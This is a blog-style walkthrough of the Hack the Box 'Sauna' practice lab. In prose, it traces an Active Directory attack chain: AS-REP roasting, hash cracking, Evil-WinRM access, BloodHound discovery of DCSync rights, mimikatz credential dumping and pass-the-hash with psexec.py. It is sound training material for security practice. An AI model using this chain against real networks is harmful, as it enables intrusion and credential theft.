030#:HTB - Sauna
It just so happens that the next one moving down the list of Hack the Box rooms is also on TJ Null’s OSCP prep list. It’s a window’s machine too, so this should be good.
Unsurprisingly, there is a lot going on here. I added the egotistical-bank.htb domain to my hosts file, started a gobuster scan, and began combing over the website.
I didn’t notice anything in the source code and gobuster didn’t reveal much besides a couple of restricted web directories. At this point, I moved on to trying to enumerating LDAP and SMB shares/users without much luck.
I’m feeling a bit stuck, so I went over the nmap results again and the website pages again. This time through I noticed they mention a bunch of employee names under a “meet the team” section of their site.
For now, I made a user list with a few variations of each name.
I have much less experience attacking Windows machines, so I start reviewing some of my notes to see where to go from here. I tried using GetUserSPNs.py to identify vulnerable accounts. This wasn’t getting me anything so I referred to the guided mode question to get back on track.
After switching tools and playing with the syntax, I was able to get a AS-REP’able account and a password hash. I also checked out the anarchy script they recommended and made a new user file called anarchy.txt. The username ended up being in my original list anyway, but I hadn’t known about this script beforehand so it worked out.
From here, we are able to quickly crack this hash using hashcat.
Now that I have a password I revisted the nmap results to see what I can get into. Port 5985 is open, so I tried to connect with Evil-WinRM.
From here we can find our first flag in this user’s Desktop folder. Interestingly, there are some other files here too. I realized now that someone else was working on this room at the same time as me. I had planned on starting with WinPEAS anyway, so that just saves me a step.
In the WinPEAS results I discovered a svc_loanmgr user and their password. I tried and failed to connect with Evil-WInRM as the new account so I resumed looking over the WinPEAS results for now. In the Autorun Applications section there was a bunch of potential leads, so I began by just reading the Hacktricks article they included in the results.
That didn’t result in anything worthwhile though. I got to the end of the WinPEAS results so I decided to try the svc_loanmgr account some more. I used it to enumerate SMB but I didn’t find anything valuable after poking around them for a bit.
I remembered seeing another username in the WinPEAS results that I forgot to write down. After running WinPEAS again, I found the other user account was hsmith. People sometimes use the same credentials across multiple accounts so I tried the svc_loanmgr password with hsmith which did not work.
I also tried to use the password for the Administrator account, but that failed too. Feeling stuck, I returned back to my notes. I haven’t used bloodhound yet, and I have two accounts to explore so that seems like a good next step.
From Bloodhound’s GUI we can grab the collector. Then using Evil-WinRM we can transfer the collector to the victim and pull the results after it’s done running.
Once our data is ingested into bloodhound we can mark the accounts we have as Owned. Then I used the built-in search “Shortest paths to Tier Zero / High Value targets” and began exploring.
A lot of nodes appear, but the main thing I am looking for here is connections to and from the accounts we have credentials for. FSmith doesn’t have much going on, but svc_loanmgr has DCSync over the domain. The notes in Bloodhound say we can dump credentials with mimikatz using this. My personal notes say I can use secretsdump.py at this step too, so I will give that a go.
I was having a couple issues at this point, mainly that I couldn’t run mimikatz as the svc_loanmgr user. I had tried logging in as the user win Evil-WinRM that failed before, but trying again now seems to work.
The other problem I had was that when running mimikatz on the victim, it just kept looping the interactive terminal and wouldn’t let me run commands. I saw one workaround was to pass the commands as arguments when running mimikatz.
Nice! Looks like we have an NTLM hash for the Administrator account. I tried cracking this with rockyou.txt and another wordlist that both failed to recover the password. When that didn’t work, I started adding the NTLM 1 and NTLM 2 values to my hash file too. Running this again against rockyou.txt resulted in a password crack.
This password didn’t work when I tried connecting with Evil-WinRM though. Maybe it’s an old password? Looking over my notes, I realized I don’t even need to crack this password because I can just pass-the-hash. Using psexec.py, I am able to get connected using the LM value combined with the NTLM value mimikatz listed for Administrator.
From here we were able to get our final flag. This was a really fun room for practicing Windows machines and gave some good experience with common tools used to attack Windows. Also, I’m glad I took good personal notes in the past as it made navigating these tools and remembering things to check easier to remember.